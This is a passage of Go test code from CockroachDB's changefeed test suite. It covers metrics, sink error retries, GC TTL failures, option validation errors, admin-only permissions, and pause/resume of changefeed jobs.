if c := s.MustGetSQLCounter(`changefeed.emitted_messages`); c != 0 {
t.Errorf(`expected 0 got %d`, c)
}
if c := s.MustGetSQLCounter(`changefeed.emitted_bytes`); c != 0 {
t.Errorf(`expected 0 got %d`, c)
}
if c := s.MustGetSQLCounter(`changefeed.emit_nanos`); c != 0 {
t.Errorf(`expected 0 got %d`, c)
}
if c := s.MustGetSQLCounter(`changefeed.flushes`); c != 0 {
t.Errorf(`expected 0 got %d`, c)
}
if c := s.MustGetSQLCounter(`changefeed.flush_nanos`); c != 0 {
t.Errorf(`expected 0 got %d`, c)
}
if c := s.MustGetSQLCounter(`changefeed.max_behind_nanos`); c != 0 {
t.Errorf(`expected %d got %d`, 0, c)
}
if c := s.MustGetSQLCounter(`changefeed.buffer_entries.in`); c != 0 {
t.Errorf(`expected 0 got %d`, c)
}
if c := s.MustGetSQLCounter(`changefeed.buffer_entries.out`); c != 0 {
t.Errorf(`expected 0 got %d`, c)
}
beforeEmitRowCh <- struct{}{}
foo := feed(t, f, `CREATE CHANGEFEED FOR foo`)
_, _ = foo.Next()
testutils.SucceedsSoon(t, func() error {
if c := s.MustGetSQLCounter(`changefeed.emitted_messages`); c != 1 {
return errors.Errorf(`expected 1 got %d`, c)
}
if c := s.MustGetSQLCounter(`changefeed.emitted_bytes`); c != 22 {
return errors.Errorf(`expected 22 got %d`, c)
}
if c := s.MustGetSQLCounter(`changefeed.emit_nanos`); c <= 0 {
return errors.Errorf(`expected > 0 got %d`, c)
}
if c := s.MustGetSQLCounter(`changefeed.flushes`); c <= 0 {
return errors.Errorf(`expected > 0 got %d`, c)
}
if c := s.MustGetSQLCounter(`changefeed.flush_nanos`); c <= 0 {
return errors.Errorf(`expected > 0 got %d`, c)
}
if c := s.MustGetSQLCounter(`changefeed.max_behind_nanos`); c <= 0 {
return errors.Errorf(`expected > 0 got %d`, c)
}
if c := s.MustGetSQLCounter(`changefeed.buffer_entries.in`); c <= 0 {
return errors.Errorf(`expected > 0 got %d`, c)
}
if c := s.MustGetSQLCounter(`changefeed.buffer_entries.out`); c <= 0 {
return errors.Errorf(`expected > 0 got %d`, c)
}
return nil
})
// Not reading from foo will backpressure it and max_behind_nanos will grow.
sqlDB.Exec(t, `INSERT INTO foo VALUES (2)`)
const expectedLatency = 100 * time.Millisecond
sqlDB.Exec(t, `SET CLUSTER SETTING kv.closed_timestamp.target_duration = $1`,
(expectedLatency / 3).String())
sqlDB.Exec(t, `SET CLUSTER SETTING kv.closed_timestamp.close_fraction = 1.0`)
testutils.SucceedsSoon(t, func() error {
waitForBehindNanos := 2 * expectedLatency.Nanoseconds()
if c := s.MustGetSQLCounter(`changefeed.max_behind_nanos`); c < waitForBehindNanos {
return errors.Errorf(
`waiting for the feed to be > %d nanos behind got %d`, waitForBehindNanos, c)
}
return nil
})
// Unblocking the emit should bring the max_behind_nanos back down.
// Unfortunately, this is sensitive to how many closed timestamp updates are
// received. If we get them too fast, it takes longer to process them then
// they come in and we fall continually further behind. The target_duration
// and close_fraction settings above are tuned to try to avoid this.
close(beforeEmitRowCh)
_, _ = foo.Next()
testutils.SucceedsSoon(t, func() error {
waitForBehindNanos := expectedLatency.Nanoseconds()
if c := s.MustGetSQLCounter(`changefeed.max_behind_nanos`); c > waitForBehindNanos {
return errors.Errorf(
`waiting for the feed to be < %d nanos behind got %d`, waitForBehindNanos, c)
}
return nil
})
// Check that two changefeeds add correctly.
// Set cluster settings back so we don't interfere with schema changes.
sqlDB.Exec(t, `SET CLUSTER SETTING kv.closed_timestamp.target_duration = '1s'`)
fooCopy := feed(t, f, `CREATE CHANGEFEED FOR foo`)
_, _ = fooCopy.Next()
_, _ = fooCopy.Next()
testutils.SucceedsSoon(t, func() error {
// We can't assert exactly 4 or 88 in case we get (allowed) duplicates
// from RangeFeed.
if c := s.MustGetSQLCounter(`changefeed.emitted_messages`); c < 4 {
return errors.Errorf(`expected >= 4 got %d`, c)
}
if c := s.MustGetSQLCounter(`changefeed.emitted_bytes`); c < 88 {
return errors.Errorf(`expected >= 88 got %d`, c)
}
return nil
})
// Cancel all the changefeeds and check that max_behind_nanos returns to 0.
require.NoError(t, foo.Close())
require.NoError(t, fooCopy.Close())
testutils.SucceedsSoon(t, func() error {
if c := s.MustGetSQLCounter(`changefeed.max_behind_nanos`); c != 0 {
return errors.Errorf(`expected 0 got %d`, c)
}
return nil
})
}
t.Run(`sinkless`, sinklessTest(testFn))
t.Run(`enterprise`, func(t *testing.T) {
t.Skip("https://github.com/cockroachdb/cockroach/issues/38443")
enterpriseTest(testFn)
})
}
func TestChangefeedRetryableError(t *testing.T) {
defer leaktest.AfterTest(t)()
defer utilccl.TestingEnableEnterprise()()
testFn := func(t *testing.T, db *gosql.DB, f cdctest.TestFeedFactory) {
knobs := f.Server().(*server.TestServer).Cfg.TestingKnobs.
DistSQL.(*execinfra.TestingKnobs).
Changefeed.(*TestingKnobs)
origAfterSinkFlushHook := knobs.AfterSinkFlush
var failSink int64
failSinkHook := func() error {
switch atomic.LoadInt64(&failSink) {
case 1:
return MarkRetryableError(fmt.Errorf("synthetic retryable error"))
case 2:
return fmt.Errorf("synthetic terminal error")
}
return origAfterSinkFlushHook()
}
knobs.AfterSinkFlush = failSinkHook
// Set up a new feed and verify that the sink is started up.
sqlDB := sqlutils.MakeSQLRunner(db)
sqlDB.Exec(t, `CREATE TABLE foo (a INT PRIMARY KEY)`)
foo := feed(t, f, `CREATE CHANGEFEED FOR foo`)
defer closeFeed(t, foo)
sqlDB.Exec(t, `INSERT INTO foo VALUES (1)`)
assertPayloads(t, foo, []string{
`foo: [1]->{"after": {"a": 1}}`,
})
// Set sink to return unique retryable errors and insert a row. Verify that
// sink is failing requests.
atomic.StoreInt64(&failSink, 1)
sqlDB.Exec(t, `INSERT INTO foo VALUES (2)`)
registry := f.Server().JobRegistry().(*jobs.Registry)
retryCounter := registry.MetricsStruct().Changefeed.(*Metrics).ErrorRetries
testutils.SucceedsSoon(t, func() error {
if retryCounter.Counter.Count() < 3 {
return fmt.Errorf("insufficient error retries detected")
}
return nil
})
// Fix the sink and insert another row. Check that nothing funky happened.
atomic.StoreInt64(&failSink, 0)
sqlDB.Exec(t, `INSERT INTO foo VALUES (3)`)
assertPayloads(t, foo, []string{
`foo: [2]->{"after": {"a": 2}}`,
`foo: [3]->{"after": {"a": 3}}`,
})
// Set sink to return a terminal error and insert a row. Ensure that we
// eventually get the error message back out.
atomic.StoreInt64(&failSink, 2)
sqlDB.Exec(t, `INSERT INTO foo VALUES (4)`)
for {
_, err := foo.Next()
if err == nil {
continue
}
require.EqualError(t, err, `synthetic terminal error`)
break
}
}
// Only the enterprise version uses jobs.
t.Run(`enterprise`, enterpriseTest(testFn))
}
// TestChangefeedDataTTL ensures that changefeeds fail with an error in the case
// where the feed has fallen behind the GC TTL of the table data.
func TestChangefeedDataTTL(t *testing.T) {
defer leaktest.AfterTest(t)()
t.Skip("https://github.com/cockroachdb/cockroach/issues/37154")
testFn := func(t *testing.T, db *gosql.DB, f cdctest.TestFeedFactory) {
ctx := context.Background()
// Set a very simple channel-based, wait-and-resume function as the
// BeforeEmitRow hook.
var shouldWait int32
wait := make(chan struct{})
resume := make(chan struct{})
knobs := f.Server().(*server.TestServer).Cfg.TestingKnobs.
DistSQL.(*execinfra.TestingKnobs).
Changefeed.(*TestingKnobs)
knobs.BeforeEmitRow = func(_ context.Context) error {
if atomic.LoadInt32(&shouldWait) == 0 {
return nil
}
wait <- struct{}{}
<-resume
return nil
}
sqlDB := sqlutils.MakeSQLRunner(db)
// Create the data table; it will only contain a single row with multiple
// versions.
sqlDB.Exec(t, `CREATE TABLE foo (a INT PRIMARY KEY, b STRING)`)
counter := 0
upsertRow := func() {
counter++
sqlDB.Exec(t, `UPSERT INTO foo (a, b) VALUES (1, $1)`, fmt.Sprintf("version %d", counter))
}
// Create the initial version of the row and the changefeed itself. The initial
// version is necessary to prevent CREATE CHANGEFEED itself from hanging.
upsertRow()
dataExpiredRows := feed(t, f, "CREATE CHANGEFEED FOR TABLE foo")
defer closeFeed(t, dataExpiredRows)
// Set up our emit trap and update the row, which will allow us to "pause" the
// changefeed in order to force a GC.
atomic.StoreInt32(&shouldWait, 1)
upsertRow()
<-wait
// Upsert two additional versions. One of these will be deleted by the GC
// process before changefeed polling is resumed.
upsertRow()
upsertRow()
// Force a GC of the table. This should cause both older versions of the
// table to be deleted, with the middle version being lost to the changefeed.
forceTableGC(t, f.Server(), sqlDB, "d", "foo")
// Resume our changefeed normally.
atomic.StoreInt32(&shouldWait, 0)
resume <- struct{}{}
// Verify that, at some point, Next() returns a "must be after replica GC
// threshold" error. In the common case, that'll be the third call, but
// various conditions will cause RangeFeed to emit duplicates and so it may
// be a few more.
//
// TODO(tbg): this should keep track of the values seen and once we have
// observed all four (which should never happen), fail the test.
for {
msg, err := dataExpiredRows.Next()
if testutils.IsError(err, `must be after replica GC threshold`) {
break
}
if msg != nil {
log.Infof(ctx, "ignoring message %s", msg)
}
}
}
t.Run("sinkless", sinklessTest(testFn))
t.Run("enterprise", enterpriseTest(testFn))
}
// TestChangefeedSchemaTTL ensures that changefeeds fail with an error in the case
// where the feed has fallen behind the GC TTL of the table's schema.
func TestChangefeedSchemaTTL(t *testing.T) {
defer leaktest.AfterTest(t)()
testFn := func(t *testing.T, db *gosql.DB, f cdctest.TestFeedFactory) {
// Set a very simple channel-based, wait-and-resume function as the
// BeforeEmitRow hook.
var shouldWait int32
wait := make(chan struct{})
resume := make(chan struct{})
knobs := f.Server().(*server.TestServer).Cfg.TestingKnobs.
DistSQL.(*execinfra.TestingKnobs).
Changefeed.(*TestingKnobs)
knobs.BeforeEmitRow = func(_ context.Context) error {
if atomic.LoadInt32(&shouldWait) == 0 {
return nil
}
wait <- struct{}{}
<-resume
return nil
}
sqlDB := sqlutils.MakeSQLRunner(db)
// Create the data table; it will only contain a single row with multiple
// versions.
sqlDB.Exec(t, `CREATE TABLE foo (a INT PRIMARY KEY, b STRING)`)
counter := 0
upsertRow := func() {
counter++
sqlDB.Exec(t, `UPSERT INTO foo (a, b) VALUES (1, $1)`, fmt.Sprintf("version %d", counter))
}
// Create the initial version of the row and the changefeed itself. The initial
// version is necessary to prevent CREATE CHANGEFEED itself from hanging.
upsertRow()
dataExpiredRows := feed(t, f, "CREATE CHANGEFEED FOR TABLE foo")
defer closeFeed(t, dataExpiredRows)
// Set up our emit trap and update the row, which will allow us to "pause" the
// changefeed in order to force a GC.
atomic.StoreInt32(&shouldWait, 1)
upsertRow()
<-wait
// Upsert two additional versions. One of these will be deleted by the GC
// process before changefeed polling is resumed.
waitForSchemaChange(t, sqlDB, "ALTER TABLE foo ADD COLUMN c STRING")
upsertRow()
waitForSchemaChange(t, sqlDB, "ALTER TABLE foo ADD COLUMN d STRING")
upsertRow()
// Force a GC of the table. This should cause both older versions of the
// table to be deleted, with the middle version being lost to the changefeed.
forceTableGC(t, f.Server(), sqlDB, "system", "descriptor")
// Resume our changefeed normally.
atomic.StoreInt32(&shouldWait, 0)
resume <- struct{}{}
// Verify that the third call to Next() returns an error (the first is the
// initial row, the second is the first change. The third should detect the
// GC interval mismatch).
_, _ = dataExpiredRows.Next()
_, _ = dataExpiredRows.Next()
if _, err := dataExpiredRows.Next(); !testutils.IsError(err, `GC threshold`) {
t.Errorf(`expected "GC threshold" error got: %+v`, err)
}
}
t.Run("sinkless", sinklessTest(testFn))
t.Run("enterprise", enterpriseTest(testFn))
}
func TestChangefeedErrors(t *testing.T) {
defer leaktest.AfterTest(t)()
ctx := context.Background()
s, db, _ := serverutils.StartServer(t, base.TestServerArgs{})
defer s.Stopper().Stop(ctx)
sqlDB := sqlutils.MakeSQLRunner(db)
sqlDB.Exec(t, `CREATE TABLE foo (a INT PRIMARY KEY, b STRING)`)
sqlDB.Exec(t, `CREATE DATABASE d`)
// Changefeeds default to rangefeed, but for now, rangefeed defaults to off.
// Verify that this produces a useful error.
sqlDB.Exec(t, `SET CLUSTER SETTING kv.rangefeed.enabled = false`)
sqlDB.Exec(t, `CREATE TABLE rangefeed_off (a INT PRIMARY KEY)`)
sqlDB.ExpectErr(
t, `rangefeeds require the kv.rangefeed.enabled setting`,
`EXPERIMENTAL CHANGEFEED FOR rangefeed_off`,
)
sqlDB.Exec(t, `SET CLUSTER SETTING kv.rangefeed.enabled TO DEFAULT`)
sqlDB.ExpectErr(
t, `unknown format: nope`,
`EXPERIMENTAL CHANGEFEED FOR foo WITH format=nope`,
)
sqlDB.ExpectErr(
t, `unknown envelope: nope`,
`EXPERIMENTAL CHANGEFEED FOR foo WITH envelope=nope`,
)
sqlDB.ExpectErr(
t, `negative durations are not accepted: resolved='-1s'`,
`EXPERIMENTAL CHANGEFEED FOR foo WITH resolved='-1s'`,
)
sqlDB.ExpectErr(
t, `cannot specify timestamp in the future`,
`EXPERIMENTAL CHANGEFEED FOR foo WITH cursor=$1`, timeutil.Now().Add(time.Hour),
)
sqlDB.ExpectErr(
t, `omit the SINK clause`,
`CREATE CHANGEFEED FOR foo INTO ''`,
)
sqlDB.ExpectErr(
t, `omit the SINK clause`,
`CREATE CHANGEFEED FOR foo INTO $1`, ``,
)
enableEnterprise := utilccl.TestingDisableEnterprise()
sqlDB.ExpectErr(
t, `CHANGEFEED requires an enterprise license`,
`CREATE CHANGEFEED FOR foo INTO $1`, `kafka://nope`,
)
enableEnterprise()
// Watching system.jobs would create a cycle, since the resolved timestamp
// high-water mark is saved in it.
sqlDB.ExpectErr(
t, `not supported on system tables`,
`EXPERIMENTAL CHANGEFEED FOR system.jobs`,
)
sqlDB.ExpectErr(
t, `table "bar" does not exist`,
`EXPERIMENTAL CHANGEFEED FOR bar`,
)
sqlDB.Exec(t, `CREATE SEQUENCE seq`)
sqlDB.ExpectErr(
t, `CHANGEFEED cannot target sequences: seq`,
`EXPERIMENTAL CHANGEFEED FOR seq`,
)
sqlDB.Exec(t, `CREATE VIEW vw AS SELECT a, b FROM foo`)
sqlDB.ExpectErr(
t, `CHANGEFEED cannot target views: vw`,
`EXPERIMENTAL CHANGEFEED FOR vw`,
)
// Backup has the same bad error message #28170.
sqlDB.ExpectErr(
t, `"information_schema.tables" does not exist`,
`EXPERIMENTAL CHANGEFEED FOR information_schema.tables`,
)
// TODO(dan): These two tests shouldn't need initial data in the table
// to pass.
sqlDB.Exec(t, `CREATE TABLE dec (a DECIMAL PRIMARY KEY)`)
sqlDB.Exec(t, `INSERT INTO dec VALUES (1.0)`)
sqlDB.ExpectErr(
t, `pq: column a: decimal with no precision`,
`EXPERIMENTAL CHANGEFEED FOR dec WITH format=$1, confluent_schema_registry=$2`,
changefeedbase.OptFormatAvro, `bar`,
)
sqlDB.Exec(t, `CREATE TABLE "oid" (a OID PRIMARY KEY)`)
sqlDB.Exec(t, `INSERT INTO "oid" VALUES (3::OID)`)
sqlDB.ExpectErr(
t, `pq: column a: type OID not yet supported with avro`,
`EXPERIMENTAL CHANGEFEED FOR "oid" WITH format=$1, confluent_schema_registry=$2`,
changefeedbase.OptFormatAvro, `bar`,
)
// Check that confluent_schema_registry is only accepted if format is avro.
sqlDB.ExpectErr(
t, `unknown sink query parameter: confluent_schema_registry`,
`CREATE CHANGEFEED FOR foo INTO $1`, `experimental-sql://d/?confluent_schema_registry=foo`,
)
// Check unavailable kafka.
sqlDB.ExpectErr(
t, `client has run out of available brokers`,
`CREATE CHANGEFEED FOR foo INTO 'kafka://nope'`,
)
// kafka_topic_prefix was referenced by an old version of the RFC, it's
// "topic_prefix" now.
sqlDB.ExpectErr(
t, `unknown sink query parameter: kafka_topic_prefix`,
`CREATE CHANGEFEED FOR foo INTO $1`, `kafka://nope/?kafka_topic_prefix=foo`,
)
// schema_topic will be implemented but isn't yet.
sqlDB.ExpectErr(
t, `schema_topic is not yet supported`,
`CREATE CHANGEFEED FOR foo INTO $1`, `kafka://nope/?schema_topic=foo`,
)
// Sanity check kafka tls parameters.
sqlDB.ExpectErr(
t, `param tls_enabled must be a bool`,
`CREATE CHANGEFEED FOR foo INTO $1`, `kafka://nope/?tls_enabled=foo`,
)
sqlDB.ExpectErr(
t, `param ca_cert must be base 64 encoded`,
`CREATE CHANGEFEED FOR foo INTO $1`, `kafka://nope/?ca_cert=!`,
)
sqlDB.ExpectErr(
t, `ca_cert requires tls_enabled=true`,
`CREATE CHANGEFEED FOR foo INTO $1`, `kafka://nope/?&ca_cert=Zm9v`,
)
sqlDB.ExpectErr(
t, `param client_cert must be base 64 encoded`,
`CREATE CHANGEFEED FOR foo INTO $1`, `kafka://nope/?client_cert=!`,
)
sqlDB.ExpectErr(
t, `param client_key must be base 64 encoded`,
`CREATE CHANGEFEED FOR foo INTO $1`, `kafka://nope/?client_key=!`,
)
sqlDB.ExpectErr(
t, `client_cert requires tls_enabled=true`,
`CREATE CHANGEFEED FOR foo INTO $1`, `kafka://nope/?client_cert=Zm9v`,
)
sqlDB.ExpectErr(
t, `client_cert requires client_key to be set`,
`CREATE CHANGEFEED FOR foo INTO $1`, `kafka://nope/?tls_enabled=true&client_cert=Zm9v`,
)
sqlDB.ExpectErr(
t, `client_key requires client_cert to be set`,
`CREATE CHANGEFEED FOR foo INTO $1`, `kafka://nope/?tls_enabled=true&client_key=Zm9v`,
)
sqlDB.ExpectErr(
t, `invalid client certificate`,
`CREATE CHANGEFEED FOR foo INTO $1`, `kafka://nope/?tls_enabled=true&client_cert=Zm9v&client_key=Zm9v`,
)
// Sanity check kafka sasl parameters.
sqlDB.ExpectErr(
t, `param sasl_enabled must be a bool`,
`CREATE CHANGEFEED FOR foo INTO $1`, `kafka://nope/?sasl_enabled=maybe`,
)
sqlDB.ExpectErr(
t, `param sasl_handshake must be a bool`,
`CREATE CHANGEFEED FOR foo INTO $1`, `kafka://nope/?sasl_enabled=true&sasl_handshake=maybe`,
)
sqlDB.ExpectErr(
t, `sasl_enabled must be enabled to configure SASL handshake behavior`,
`CREATE CHANGEFEED FOR foo INTO $1`, `kafka://nope/?sasl_handshake=false`,
)
sqlDB.ExpectErr(
t, `sasl_user must be provided when SASL is enabled`,
`CREATE CHANGEFEED FOR foo INTO $1`, `kafka://nope/?sasl_enabled=true`,
)
sqlDB.ExpectErr(
t, `sasl_password must be provided when SASL is enabled`,
`CREATE CHANGEFEED FOR foo INTO $1`, `kafka://nope/?sasl_enabled=true&sasl_user=a`,
)
sqlDB.ExpectErr(
t, `sasl_enabled must be enabled if a SASL user is provided`,
`CREATE CHANGEFEED FOR foo INTO $1`, `kafka://nope/?sasl_user=a`,
)
sqlDB.ExpectErr(
t, `sasl_enabled must be enabled if a SASL password is provided`,
`CREATE CHANGEFEED FOR foo INTO $1`, `kafka://nope/?sasl_password=a`,
)
// The avro format doesn't support key_in_value yet.
sqlDB.ExpectErr(
t, `key_in_value is not supported with format=experimental_avro`,
`CREATE CHANGEFEED FOR foo INTO $1 WITH key_in_value, format='experimental_avro'`,
`kafka://nope`,
)
// The cloudStorageSink is particular about the options it will work with.
sqlDB.ExpectErr(
t, `this sink is incompatible with format=experimental_avro`,
`CREATE CHANGEFEED FOR foo INTO $1 WITH format='experimental_avro', confluent_schema_registry=$2`,
`experimental-nodelocal://0/bar`, `schemareg-nope`,
)
sqlDB.ExpectErr(
t, `this sink is incompatible with envelope=key_only`,
`CREATE CHANGEFEED FOR foo INTO $1 WITH envelope='key_only'`,
`experimental-nodelocal://0/bar`,
)
// WITH key_in_value requires envelope=wrapped
sqlDB.ExpectErr(
t, `key_in_value is only usable with envelope=wrapped`,
`CREATE CHANGEFEED FOR foo INTO $1 WITH key_in_value, envelope='key_only'`, `kafka://nope`,
)
sqlDB.ExpectErr(
t, `key_in_value is only usable with envelope=wrapped`,
`CREATE CHANGEFEED FOR foo INTO $1 WITH key_in_value, envelope='row'`, `kafka://nope`,
)
// WITH diff requires envelope=wrapped
sqlDB.ExpectErr(
t, `diff is only usable with envelope=wrapped`,
`CREATE CHANGEFEED FOR foo INTO $1 WITH diff, envelope='key_only'`, `kafka://nope`,
)
sqlDB.ExpectErr(
t, `diff is only usable with envelope=wrapped`,
`CREATE CHANGEFEED FOR foo INTO $1 WITH diff, envelope='row'`, `kafka://nope`,
)
// WITH initial_scan and no_initial_scan disallowed
sqlDB.ExpectErr(
t, `cannot specify both initial_scan and no_initial_scan`,
`CREATE CHANGEFEED FOR foo INTO $1 WITH initial_scan, no_initial_scan`, `kafka://nope`,
)
sqlDB.ExpectErr(
t, `cannot specify both initial_scan and no_initial_scan`,
`CREATE CHANGEFEED FOR foo INTO $1 WITH no_initial_scan, initial_scan`, `kafka://nope`,
)
}
func TestChangefeedPermissions(t *testing.T) {
defer leaktest.AfterTest(t)()
testFn := func(t *testing.T, db *gosql.DB, f cdctest.TestFeedFactory) {
sqlDB := sqlutils.MakeSQLRunner(db)
sqlDB.Exec(t, `CREATE TABLE foo (a INT PRIMARY KEY, b STRING)`)
sqlDB.Exec(t, `CREATE USER testuser`)
s := f.Server()
pgURL, cleanupFunc := sqlutils.PGUrl(
t, s.ServingSQLAddr(), "TestChangefeedPermissions-testuser", url.User("testuser"),
)
defer cleanupFunc()
testuser, err := gosql.Open("postgres", pgURL.String())
if err != nil {
t.Fatal(err)
}
defer testuser.Close()
stmt := `EXPERIMENTAL CHANGEFEED FOR foo`
if strings.Contains(t.Name(), `enterprise`) {
stmt = `CREATE CHANGEFEED FOR foo`
}
if _, err := testuser.Exec(stmt); !testutils.IsError(err, `only users with the admin role`) {
t.Errorf(`expected 'only users with the admin role' error got: %+v`, err)
}
}
t.Run(`sinkless`, sinklessTest(testFn))
t.Run(`enterprise`, enterpriseTest(testFn))
}
func TestChangefeedDescription(t *testing.T) {
defer leaktest.AfterTest(t)()
testFn := func(t *testing.T, db *gosql.DB, f cdctest.TestFeedFactory) {
sqlDB := sqlutils.MakeSQLRunner(db)
sqlDB.Exec(t, `CREATE TABLE foo (a INT PRIMARY KEY)`)
sqlDB.Exec(t, `INSERT INTO foo VALUES (1)`)
// Intentionally don't use the TestFeedFactory because we want to
// control the placeholders.
s := f.Server()
sink, cleanup := sqlutils.PGUrl(t, s.ServingSQLAddr(), t.Name(), url.User(security.RootUser))
defer cleanup()
sink.Scheme = changefeedbase.SinkSchemeExperimentalSQL
sink.Path = `d`
var jobID int64
sqlDB.QueryRow(t,
`CREATE CHANGEFEED FOR foo INTO $1 WITH updated, envelope = $2`, sink.String(), `wrapped`,
).Scan(&jobID)
var description string
sqlDB.QueryRow(t,
`SELECT description FROM [SHOW JOBS] WHERE job_id = $1`, jobID,
).Scan(&description)
expected := `CREATE CHANGEFEED FOR TABLE foo INTO '` + sink.String() +
`' WITH envelope = 'wrapped', updated`
if description != expected {
t.Errorf(`got "%s" expected "%s"`, description, expected)
}
}
// Only the enterprise version uses jobs.
t.Run(`enterprise`, enterpriseTest(testFn))
}
func TestChangefeedPauseUnpause(t *testing.T) {
defer leaktest.AfterTest(t)()
defer func(i time.Duration) { jobs.DefaultAdoptInterval = i }(jobs.DefaultAdoptInterval)
jobs.DefaultAdoptInterval = 10 * time.Millisecond
testFn := func(t *testing.T, db *gosql.DB, f cdctest.TestFeedFactory) {
sqlDB := sqlutils.MakeSQLRunner(db)
sqlDB.Exec(t, `CREATE TABLE foo (a INT PRIMARY KEY, b STRING)`)
sqlDB.Exec(t, `INSERT INTO foo VALUES (1, 'a'), (2, 'b'), (4, 'c'), (7, 'd'), (8, 'e')`)
foo := feed(t, f, `CREATE CHANGEFEED FOR foo WITH resolved`).(*cdctest.TableFeed)
defer closeFeed(t, foo)
assertPayloads(t, foo, []string{
`foo: [1]->{"after": {"a": 1, "b": "a"}}`,
`foo: [2]->{"after": {"a": 2, "b": "b"}}`,
`foo: [4]->{"after": {"a": 4, "b": "c"}}`,
`foo: [7]->{"after": {"a": 7, "b": "d"}}`,
`foo: [8]->{"after": {"a": 8, "b": "e"}}`,
})
// Wait for the high-water mark on the job to be updated after the initial
// scan, to make sure we don't get the initial scan data again.
m, err := foo.Next()
if err != nil {
t.Fatal(err)
} else if m.Key != nil {
t.Fatalf(`expected a resolved timestamp got %s: %s->%s`, m.Topic, m.Key, m.Value)
}
sqlDB.Exec(t, `PAUSE JOB $1`, foo.JobID)
// PAUSE JOB only requests the job to be paused. Block until it's paused.
opts := retry.Options{
InitialBackoff: 1 * time.Millisecond,
MaxBackoff: time.Second,
Multiplier: 2,
}
ctx := context.Background()
if err := retry.WithMaxAttempts(ctx, opts, 10, func() error {
var status string
sqlDB.QueryRow(t, `SELECT status FROM system.jobs WHERE id = $1`, foo.JobID).Scan(&status)
if jobs.Status(status) != jobs.StatusPaused {
return errors.New("could not pause job")
}
return nil
}); err != nil {
t.Fatal(err)
}
sqlDB.Exec(t, `INSERT INTO foo VALUES (16, 'f')`)
sqlDB.Exec(t, `RESUME JOB $1`, foo.JobID)
assertPayloads(t, foo, []string{
`foo: [16]->{"after": {"a": 16, "b": "f"}}`,
})
}
// Only the enterprise version uses jobs.
t.Run(`enterprise`, enterpriseTest(testFn))
}
func TestChangefeedPauseUnpauseCursorAndInitialScan(t *testing.T) {
defer leaktest.AfterTest(t)()
defer func(i time.Duration) { jobs.DefaultAdoptInterval = i }(jobs.DefaultAdoptInterval)
jobs.DefaultAdoptInterval = 10 * time.Millisecond
testFn := func(t *testing.T, db *gosql.DB, f cdctest.TestFeedFactory) {
sqlDB := sqlutils.MakeSQLRunner(db)
sqlDB.Exec(t, `CREATE TABLE foo (a INT PRIMARY KEY, b STRING)`)
sqlDB.Exec(t, `INSERT INTO foo VALUES (1, 'a'), (2, 'b'), (4, 'c'), (7, 'd'), (8, 'e')`)
var tsStr string
sqlDB.QueryRow(t, `SELECT cluster_logical_timestamp() from foo`).Scan(&tsStr)
foo := feed(t, f, `CREATE CHANGEFEED FOR foo `+
`WITH initial_scan, resolved='10ms', cursor='`+tsStr+`'`).(*cdctest.TableFeed)
defer closeFeed(t, foo)
assertPayloads(t, foo, []string{
`foo: [1]->{"after": {"a": 1, "b": "a"}}`,
`foo: [2]->{"after": {"a": 2, "b": "b"}}`,
`foo: [4]->{"after": {"a": 4, "b": "c"}}`,
`foo: [7]->{"after": {"a": 7, "b": "d"}}`,
`foo: [8]->{"after": {"a": 8, "b": "e"}}`,
})
// Wait for the high-water mark on the job to be updated after the initial
// scan, to make sure we don't get the initial scan data again.
expectResolvedTimestamp(t, foo)
expectResolvedTimestamp(t, foo)
sqlDB.Exec(t, `PAUSE JOB $1`, foo.JobID)
// PAUSE JOB only requests the job to be paused. Block until it's paused.
opts := retry.Options{
InitialBackoff: 1 * time.Millisecond,
MaxBackoff: time.Second,
Multiplier: 2,
}
ctx := context.Background()
if err := retry.WithMaxAttempts(ctx, opts, 10, func() error {
var status string
sqlDB.QueryRow(t, `SELECT status FROM system.jobs WHERE id = $1`, foo.JobID).Scan(&status)
if jobs.Status(status) != jobs.StatusPaused {
return errors.New("could not pause job")
}
return nil
}); err != nil {
t.Fatal(err)
}
foo.ResetSeen()
sqlDB.Exec(t, `INSERT INTO foo VALUES (16, 'f')`)
sqlDB.Exec(t, `RESUME JOB $1`, foo.JobID)
assertPayloads(t, foo, []string{
`foo: [16]->{"after": {"a": 16, "b": "f"}}`,
})
}
// Only the enterprise version uses jobs.
t.Run(`enterprise`, enterpriseTest(testFn))
}
func TestManyChangefeedsOneTable(t *testing.T) {
defer leaktest.AfterTest(t)()
testFn := func(t *testing.T, db *gosql.DB, f cdctest.TestFeedFactory) {
sqlDB := sqlutils.MakeSQLRunner(db)
sqlDB.Exec(t, `CREATE TABLE foo (a INT PRIMARY KEY, b STRING)`)
sqlDB.Exec(t, `INSERT INTO foo VALUES (0, 'init')`)
foo1 := feed(t, f, `CREATE CHANGEFEED FOR foo WITH diff`)
defer closeFeed(t, foo1)
foo2 := feed(t, f, `CREATE CHANGEFEED FOR foo`) // without diff
defer closeFeed(t, foo2)
foo3 := feed(t, f, `CREATE CHANGEFEED FOR foo WITH diff`)
defer closeFeed(t, foo3)
// Make sure all the changefeeds are going.
assertPayloads(t, foo1, []string{`foo: [0]->{"after": {"a": 0, "b": "init"}, "before": null}`})
assertPayloads(t, foo2, []string{`foo: [0]->{"after": {"a": 0, "b": "init"}}`})
assertPayloads(t, foo3, []string{`foo: [0]->{"after": {"a": 0, "b": "init"}, "before": null}`})
sqlDB.Exec(t, `UPSERT INTO foo VALUES (0, 'v0')`)
assertPayloads(t, foo1, []string{
`foo: [0]->{"after": {"a": 0, "b": "v0"}, "before": {"a": 0, "b": "init"}}`,
})
sqlDB.Exec(t, `INSERT INTO foo VALUES (1, 'v1')`)
assertPayloads(t, foo1, []string{
`foo: [1]->{"after": {"a": 1, "b": "v1"}, "before": null}`,
})
assertPayloads(t, foo2, []string{
`foo: [0]->{"after": {"a": 0, "b": "v0"}}`,
`foo: [1]->{"after": {"a": 1, "b": "v1"}}`,
})
sqlDB.Exec(t, `UPSERT INTO foo VALUES (0, 'v2')`)
assertPayloads(t, foo1, []string{
`foo: [0]->{"after": {"a": 0, "b": "v2"}, "before": {"a": 0, "b": "v0"}}`,
})
assertPayloads(t, foo2, []string{
`foo: [0]->{"after": {"a": 0, "b": "v2"}}`,
})
assertPayloads(t, foo3, []string{
`foo: [0]->{"after": {"a": 0, "b": "v0"}, "before": {"a": 0, "b": "init"}}`,
`foo: [0]->{"after": {"a": 0, "b": "v2"}, "before": {"a": 0, "b": "v0"}}`,
`foo: [1]->{"after": {"a": 1, "b": "v1"}, "before": null}`,
})
}
t.Run(`sinkless`, sinklessTest(testFn))
t.Run(`enterprise`, enterpriseTest(testFn))
}
func TestUnspecifiedPrimaryKey(t *testing.T) {
defer leaktest.AfterTest(t)()
testFn := func(t *testing.T, db *gosql.DB, f cdctest.TestFeedFactory) {
